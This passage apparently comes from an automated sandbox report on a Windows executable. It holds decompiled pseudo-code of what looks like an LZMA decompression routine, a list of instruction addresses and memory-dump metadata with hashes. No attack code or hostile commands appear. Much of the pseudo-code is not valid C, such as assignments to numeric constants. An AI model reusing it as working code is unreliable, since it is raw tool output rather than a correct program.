              													0x800 = 0x800 - __edx;
              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L39;
              												} else {
              													goto L37;
              												}
              											case 0xe:
              												L46:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xe;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t156 = __ebp - 0x70;
              												 *_t156 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t156;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												while(1) {
              													L48:
              													__eflags = __ebx - 0x100;
              													if(__ebx >= 0x100) {
              														break;
              													}
              													__eax =  *(__ebp - 0x58);
              													__edx = __ebx + __ebx;
              													__ecx =  *(__ebp - 0x10);
              													__esi = __edx + __eax;
              													__ecx =  *(__ebp - 0x10) >> 0xb;
              													__ax =  *__esi;
              													 *(__ebp - 0x54) = __esi;
              													__edi = __ax & 0x0000ffff;
              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              													__eflags =  *(__ebp - 0xc) - __ecx;
              													if( *(__ebp - 0xc) >= __ecx) {
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              														__cx = __ax;
              														_t170 = __edx + 1; // 0x1
              														__ebx = _t170;
              														__cx = __ax >> 5;
              														__eflags = __eax;
              														 *__esi = __ax;
              													} else {
              														 *(__ebp - 0x10) = __ecx;
              														0x800 = 0x800 - __edi;
              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              														__ebx = __ebx + __ebx;
              														 *__esi = __cx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														continue;
              													} else {
              														goto L46;
              													}
              												}
              												L54:
              												_t173 = __ebp - 0x34;
              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              												__eflags =  *_t173;
              												goto L55;
              											case 0xf:
              												L58:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xf;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t203 = __ebp - 0x70;
              												 *_t203 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t203;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L60:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													L55:
              													__al =  *(__ebp - 0x44);
              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              													goto L56;
              												}
              												L61:
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t217 = __edx + 1; // 0x1
              													__ebx = _t217;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L60;
              												} else {
              													goto L58;
              												}
              											case 0x10:
              												L109:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x10;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t365 = __ebp - 0x70;
              												 *_t365 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t365;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												goto L111;
              											case 0x11:
              												goto L69;
              											case 0x12:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 0x58);
              													 *(__ebp - 0x84) = 0x13;
              													__esi =  *(__ebp - 0x58) + 2;
              													while(1) {
              														L132:
              														 *(_t613 - 0x54) = _t606;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x4c);
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												__eflags = __eax;
              												__eax =  *(__ebp - 0x58) + __eax + 4;
              												goto L130;
              											case 0x13:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													_t469 = __ebp - 0x58;
              													 *_t469 =  *(__ebp - 0x58) + 0x204;
              													__eflags =  *_t469;
              													 *(__ebp - 0x30) = 0x10;
              													 *(__ebp - 0x40) = 8;
              													L144:
              													 *(__ebp - 0x7c) = 0x14;
              													goto L145;
              												}
              												__eax =  *(__ebp - 0x4c);
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												 *(__ebp - 0x30) = 8;
              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              												L130:
              												 *(__ebp - 0x58) = __eax;
              												 *(__ebp - 0x40) = 3;
              												goto L144;
              											case 0x14:
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              												__eax =  *(__ebp - 0x80);
              												 *(_t613 - 0x88) = _t533;
              												goto L1;
              											case 0x15:
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xb;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              												goto L120;
              											case 0x16:
              												__eax =  *(__ebp - 0x30);
              												__eflags = __eax - 4;
              												if(__eax >= 4) {
              													_push(3);
              													_pop(__eax);
              												}
              												__ecx =  *(__ebp - 4);
              												 *(__ebp - 0x40) = 6;
              												__eax = __eax << 7;
              												 *(__ebp - 0x7c) = 0x19;
              												 *(__ebp - 0x58) = __eax;
              												goto L145;
              											case 0x17:
              												L145:
              												__eax =  *(__ebp - 0x40);
              												 *(__ebp - 0x50) = 1;
              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
              												goto L149;
              											case 0x18:
              												L146:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x18;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t484 = __ebp - 0x70;
              												 *_t484 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t484;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L148:
              												_t487 = __ebp - 0x48;
              												 *_t487 =  *(__ebp - 0x48) - 1;
              												__eflags =  *_t487;
              												L149:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__ecx =  *(__ebp - 0x40);
              													__ebx =  *(__ebp - 0x50);
              													0 = 1;
              													__eax = 1 << __cl;
              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
              													__eax =  *(__ebp - 0x7c);
              													 *(__ebp - 0x44) = __ebx;
              													while(1) {
              														 *(_t613 - 0x88) = _t533;
              														goto L1;
              													}
              												}
              												__eax =  *(__ebp - 0x50);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              												__eax =  *(__ebp - 0x58);
              												__esi = __edx + __eax;
              												 *(__ebp - 0x54) = __esi;
              												__ax =  *__esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													__cx = __ax >> 5;
              													__eax = __eax - __ecx;
              													__edx = __edx + 1;
              													__eflags = __edx;
              													 *__esi = __ax;
              													 *(__ebp - 0x50) = __edx;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L148;
              												} else {
              													goto L146;
              												}
              											case 0x19:
              												__eflags = __ebx - 4;
              												if(__ebx < 4) {
              													 *(__ebp - 0x2c) = __ebx;
              													L119:
              													_t393 = __ebp - 0x2c;
              													 *_t393 =  *(__ebp - 0x2c) + 1;
              													__eflags =  *_t393;
              													L120:
              													__eax =  *(__ebp - 0x2c);
              													__eflags = __eax;
              													if(__eax == 0) {
              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              														goto L170;
              													}
              													__eflags = __eax -  *(__ebp - 0x60);
              													if(__eax >  *(__ebp - 0x60)) {
              														goto L171;
              													}
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              													__eax =  *(__ebp - 0x30);
              													_t400 = __ebp - 0x60;
              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              													__eflags =  *_t400;
              													goto L123;
              												}
              												__ecx = __ebx;
              												__eax = __ebx;
              												__ecx = __ebx >> 1;
              												__eax = __ebx & 0x00000001;
              												__ecx = (__ebx >> 1) - 1;
              												__al = __al | 0x00000002;
              												__eax = (__ebx & 0x00000001) << __cl;
              												__eflags = __ebx - 0xe;
              												 *(__ebp - 0x2c) = __eax;
              												if(__ebx >= 0xe) {
              													__ebx = 0;
              													 *(__ebp - 0x48) = __ecx;
              													L102:
              													__eflags =  *(__ebp - 0x48);
              													if( *(__ebp - 0x48) <= 0) {
              														__eax = __eax + __ebx;
              														 *(__ebp - 0x40) = 4;
              														 *(__ebp - 0x2c) = __eax;
              														__eax =  *(__ebp - 4);
              														__eax =  *(__ebp - 4) + 0x644;
              														__eflags = __eax;
              														L108:
              														__ebx = 0;
              														 *(__ebp - 0x58) = __eax;
              														 *(__ebp - 0x50) = 1;
              														 *(__ebp - 0x44) = 0;
              														 *(__ebp - 0x48) = 0;
              														L112:
              														__eax =  *(__ebp - 0x40);
              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              															_t391 = __ebp - 0x2c;
              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
              															__eflags =  *_t391;
              															goto L119;
              														}
              														__eax =  *(__ebp - 0x50);
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              														__eax =  *(__ebp - 0x58);
              														__esi = __edi + __eax;
              														 *(__ebp - 0x54) = __esi;
              														__ax =  *__esi;
              														__ecx = __ax & 0x0000ffff;
              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              														__eflags =  *(__ebp - 0xc) - __edx;
              														if( *(__ebp - 0xc) >= __edx) {
              															__ecx = 0;
              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              															__ecx = 1;
              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              															__ebx = 1;
              															__ecx =  *(__ebp - 0x48);
              															__ebx = 1 << __cl;
              															__ecx = 1 << __cl;
              															__ebx =  *(__ebp - 0x44);
              															__ebx =  *(__ebp - 0x44) | __ecx;
              															__cx = __ax;
              															__cx = __ax >> 5;
              															__eax = __eax - __ecx;
              															__edi = __edi + 1;
              															__eflags = __edi;
              															 *(__ebp - 0x44) = __ebx;
              															 *__esi = __ax;
              															 *(__ebp - 0x50) = __edi;
              														} else {
              															 *(__ebp - 0x10) = __edx;
              															0x800 = 0x800 - __ecx;
              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              															 *__esi = __dx;
              														}
              														__eflags =  *(__ebp - 0x10) - 0x1000000;
              														if( *(__ebp - 0x10) >= 0x1000000) {
              															L111:
              															_t368 = __ebp - 0x48;
              															 *_t368 =  *(__ebp - 0x48) + 1;
              															__eflags =  *_t368;
              															goto L112;
              														} else {
              															goto L109;
              														}
              													}
              													__ecx =  *(__ebp - 0xc);
              													__ebx = __ebx + __ebx;
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              														__ecx =  *(__ebp - 0x10);
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              														__ebx = __ebx | 0x00000001;
              														__eflags = __ebx;
              														 *(__ebp - 0x44) = __ebx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L101:
              														_t338 = __ebp - 0x48;
              														 *_t338 =  *(__ebp - 0x48) - 1;
              														__eflags =  *_t338;
              														goto L102;
              													} else {
              														goto L99;
              													}
              												}
              												__edx =  *(__ebp - 4);
              												__eax = __eax - __ebx;
              												 *(__ebp - 0x40) = __ecx;
              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              												goto L108;
              											case 0x1a:
              												L56:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1a;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x68);
              												__al =  *(__ebp - 0x5c);
              												__edx =  *(__ebp - 8);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *( *(__ebp - 0x68)) = __al;
              												__ecx =  *(__ebp - 0x14);
              												 *(__ecx +  *(__ebp - 8)) = __al;
              												__eax = __ecx + 1;
              												__edx = 0;
              												_t192 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t192;
              												goto L80;
              											case 0x1b:
              												L76:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1b;
              													goto L170;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t275 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t275;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												_t284 = __ebp - 0x64;
              												 *_t284 =  *(__ebp - 0x64) - 1;
              												__eflags =  *_t284;
              												 *( *(__ebp - 0x68)) = __cl;
              												L80:
              												 *(__ebp - 0x14) = __edx;
              												goto L81;
              											case 0x1c:
              												while(1) {
              													L123:
              													__eflags =  *(__ebp - 0x64);
              													if( *(__ebp - 0x64) == 0) {
              														break;
              													}
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__edx =  *(__ebp - 8);
              													__cl =  *(__eax + __edx);
              													__eax =  *(__ebp - 0x14);
              													 *(__ebp - 0x5c) = __cl;
              													 *(__eax + __edx) = __cl;
              													__eax = __eax + 1;
              													__edx = 0;
              													_t414 = __eax %  *(__ebp - 0x74);
              													__eax = __eax /  *(__ebp - 0x74);
              													__edx = _t414;
              													__eax =  *(__ebp - 0x68);
              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              													__eflags =  *(__ebp - 0x30);
              													 *( *(__ebp - 0x68)) = __cl;
              													 *(__ebp - 0x14) = _t414;
              													if( *(__ebp - 0x30) > 0) {
              														continue;
              													} else {
              														L81:
              														 *(__ebp - 0x88) = 2;
              														goto L1;
              													}
              												}
              												 *(__ebp - 0x88) = 0x1c;
              												goto L170;
              										}
              									}
              									L171:
              									_t535 = _t534 | 0xffffffff;
              									goto L172;
              								}
              							}
              						}
              					}
              					goto L1;
              				}
              			}













              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7
              0x00000000
              0x0040701c

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
              • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406F64() {
              				unsigned short _t531;
              				signed int _t532;
              				void _t533;
              				signed int _t534;
              				signed int _t535;
              				signed int _t565;
              				signed int _t568;
              				signed int _t589;
              				signed int* _t606;
              				void* _t613;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t613 - 0x40) != 0) {
              						 *(_t613 - 0x84) = 0xa;
              						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
              					} else {
              						 *(__ebp - 0x84) = 9;
              						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              					}
              					while(1) {
              						 *(_t613 - 0x54) = _t606;
              						while(1) {
              							L133:
              							_t531 =  *_t606;
              							_t589 = _t531 & 0x0000ffff;
              							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              							if( *(_t613 - 0xc) >= _t565) {
              								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
